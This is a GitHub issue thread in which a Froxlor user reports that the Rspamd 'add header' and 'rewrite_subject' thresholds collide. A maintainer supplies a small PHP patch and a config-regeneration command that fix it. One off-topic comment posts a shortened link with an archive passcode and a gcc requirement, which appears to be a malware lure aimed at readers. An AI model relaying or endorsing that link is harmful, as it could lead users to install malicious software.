### ISSUE TITLE
Antispam feature add header and rewrite_subject does not work

### ISSUE THREAD

**Issue by feiaweng** [froxlor/Froxlor#1275]
**As a rule of thumb: before reporting an issue**
* see if it hasn't been [reported](https://github.com/Froxlor/froxlor/issues) (and possibly already been [fixed](https://github.com/Froxlor/froxlor/issues?utf8=✓&q=is:issue%20is:closed)) first
* try with the git master

**Describe the bug**
The add header value and rewrite_subject are the same. This does not work. In this case only the add header will be performed.
The settings must be different.
Example:
add header = 6.9;
rewrite_subject = 7;
In Froxlor is only one setting in database configurable.
Please change it to different values, than it will work.

**System information**
* Froxlor version: $version/$gitSHA1
* Web server: apache2/nginx/lighttpd
* DNS server: Bind/PowerDNS (standalone)/PowerDNS (Bind-backend)
* POP/IMAP server: Courier/Dovecot
* SMTP server: postfix/exim
* FTP server: proftpd/pureftpd
* OS/Version: ...

**To Reproduce**

**Expected behavior**

**Logfiles**
If applicable, add log-entries to help explain your problem.

**Additional context**

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by d00p** [comment]
Does the following patch resolve the issue?

```diff
diff --git a/lib/Froxlor/Cron/Mail/Rspamd.php b/lib/Froxlor/Cron/Mail/Rspamd.php
index ece47766..624e91dd 100644
--- a/lib/Froxlor/Cron/Mail/Rspamd.php
+++ b/lib/Froxlor/Cron/Mail/Rspamd.php
@@ -185,7 +185,7 @@ class Rspamd
                                $this->frx_settings_file .= '   apply {' . "\n";
                                $this->frx_settings_file .= '           actions {' . "\n";
                                $this->frx_settings_file .= '                   "add header" = ' . $email['spam_tag_level'] . ';' . "\n";
-                               $this->frx_settings_file .= '                   rewrite_subject = ' . $email['spam_tag_level'] . ';' . "\n";
+                               $this->frx_settings_file .= '                   rewrite_subject = ' . ($email['spam_tag_level'] + 0.01) . ';' . "\n";
                                $this->frx_settings_file .= '                   reject = ' . $email['spam_kill_level'] . ';' . "\n";
                                if ($type == 'rcpt' && (int)$email['policy_greylist'] == 0) {
                                        $this->frx_settings_file .= '                   greylist = null;' . "\n";
```

**Comment by feiaweng** [comment]
The only change I see is the green line. Have changed it in the Rspamd.php, but no changes in froxlor_settings.conf.
`
 "add header" = 7;
                        rewrite_subject = 7;
`

**Comment by d00p** [comment]
Well you need to force regeneration of the config files...`bin/froxlor-cli froxlor:cron -fd` in your froxlor install directory

**Comment by feiaweng** [comment]
I did the job froxlor-cron-with-debug, but with bin/froxlor-cli froxlor:cron -fd it has changed now.
Thanks
